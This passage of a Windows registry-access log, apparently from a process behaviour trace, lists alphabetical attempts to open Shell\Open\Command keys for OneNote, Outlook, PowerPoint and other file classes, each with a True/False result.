Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneIndex16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.12\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.14\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Application.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.CFileConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Folder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Folder.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.12\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.LinkedNotes\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.IEAddin.LinkedNotes.14\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteAnchor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteAnchorCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Notebook\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Notebook.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkContentService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkMeta\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.NoteLinkStoreService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.OutlookAddin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Package\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.PowerPointAddinTakeNotesButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.PowerPointAddinTakeNotesService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Section\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.Section.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.TableOfContents\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.TableOfContents.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.URL.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.WordAddinTakeNotesButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNote.WordAddinTakeNotesService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNoteDesktop\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OneNoteDesktop.URL.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OPCFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchblocked\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchdescription\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchfilefolderresult\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OpenSearchProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\opensearchresult\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\oqyfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OrgPlusWOPX.4\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OscAddin.Connect\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OscAddin.SharePointProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSE.Global\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.OsfAxControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.RemoterProxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.Sandbox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\osf.SandboxContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiTokenActivationSigner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OSPPWMI.OSppWmiTokenActivationSigner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otkloadr.WRAssembly\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\otkloadr.WRLoader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlMapiPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Envelope\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.det.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.eml.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.fdm.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.hol.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ics.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.msg.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.nk2.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.nst.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ofs.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.oft.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.ost.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.otm.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.pab.15\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.pst.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.vcf.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.File.vcs.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.FileAttach\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.MsgAttach\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkBusinessCardControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkBusinessCardControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCategoryStrip\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCategoryStrip.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCheckBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCheckBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkComboBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkComboBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCommandButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkCommandButton.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkContactPhoto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkContactPhoto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkDateControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkDateControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkFrameHeader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkFrameHeader.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkInfoBar\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkInfoBar.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkLabel\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkLabel.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkListBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkListBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkOptionButton\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkOptionButton.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkPageControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkPageControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkSenderPhoto\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkSenderPhoto.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTextBox\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTextBox.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeZone\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.OlkTimeZone.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.Search.MAPI16Handler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.feed.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.mailto.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.stssync.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Outlook.URL.webcal.15\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlPOPPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OutlSMTPPH\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\outlspam.SmartScreenFactoryOutlook\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OVCtl.OVCtl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OVCtl.OVCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\OWS.PostData\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P10File\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7MFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7RFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\P7SFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Package\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Package2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Paint.Picture\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PairingFolderItem\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PairingFolderItemBluetooth\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\partition\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Pathname\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pbkfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PBrush\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PCBFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFPrevHndlr.PDFPreviewHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFPrevHndlr.PDFPreviewHandler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShell.PDFShell\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShell.PDFShell.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDFShellServer.PDFShellInfo2.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Pdump.ProcessDump\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PDXFileType\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerDraw.PeerDraw\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerDraw.PeerDraw.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerFactory.PeerFactory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PeerFactory.PeerFactory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcManager.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcManager.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcSurrogate.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenIMC.PimcSurrogate.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenInputPanel.PenInputPanel\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PenInputPanel.PenInputPanel.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PerfFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pfmfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PFXFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Bitmap\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.JFIF\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Jpeg\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Png\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Tiff\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PhotoViewer.FileAssoc.Wdp\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\piffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pjpegfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PKOFile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.BootTraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.DataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.LegacyTraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.ServerDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSet\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSet.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSetCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.SystemDataCollectorSetCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProvider\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProvider.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProviderCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceDataProviderCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSessionCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PLA.TraceSessionCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pnffile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\pngfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PNGFilter.CoPNGFilter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PNGFilter.CoPNGFilter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDevice.PortableDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDevice.PortableDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceClassExtension.PortableDeviceClassExtension\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceClassExtension.PortableDeviceClassExtension.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceFTM.PortableDeviceFTM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceFTM.PortableDeviceFTM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceManager.PortableDeviceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceManager.PortableDeviceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceService.PortableDeviceService\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceService.PortableDeviceService.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceServiceFTM.PortableDeviceServiceFTM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceServiceFTM.PortableDeviceServiceFTM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValues.PortableDeviceValues\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValues.PortableDeviceValues.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValuesCollection.PortableDeviceValuesCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceValuesCollection.PortableDeviceValuesCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWiaCompat.PortableDeviceWiaCompat\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWiaCompat.PortableDeviceWiaCompat.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWMDRM.PortableDeviceWMDRM\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortableDeviceWMDRM.PortableDeviceWMDRM.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortalConnect14.PersonalSite\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PortalConnect14.PersonalSite.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Addin.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.OpenDocumentPresentation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.OpenDocumentPresentation.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Show.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.ShowMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.ShowMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.Slide.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideMacroEnabled\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideMacroEnabled.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow.12\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShow.8\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PowerPoint.SlideShowMacroEnabled\Shell\Open\Command - False 1
Fn
